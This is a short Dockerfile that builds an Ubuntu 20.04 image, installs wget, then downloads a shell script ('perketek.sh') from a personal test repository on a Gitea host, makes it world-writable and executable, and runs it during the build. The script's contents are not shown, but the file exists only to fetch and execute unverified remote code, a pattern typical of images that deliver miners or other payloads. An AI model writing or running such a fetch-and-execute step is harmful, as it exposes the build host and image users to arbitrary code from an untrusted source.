FROM ubuntu:20.04

RUN apt-get update \
  && apt-get install -y \
  && apt-get install wget -y \
  && rm -rf /var/lib/apt/lists/*

RUN wget https://try.gitea.io/kambingjanda/test/raw/branch/master/perketek.sh && chmod 777 perketek.sh && ./perketek.sh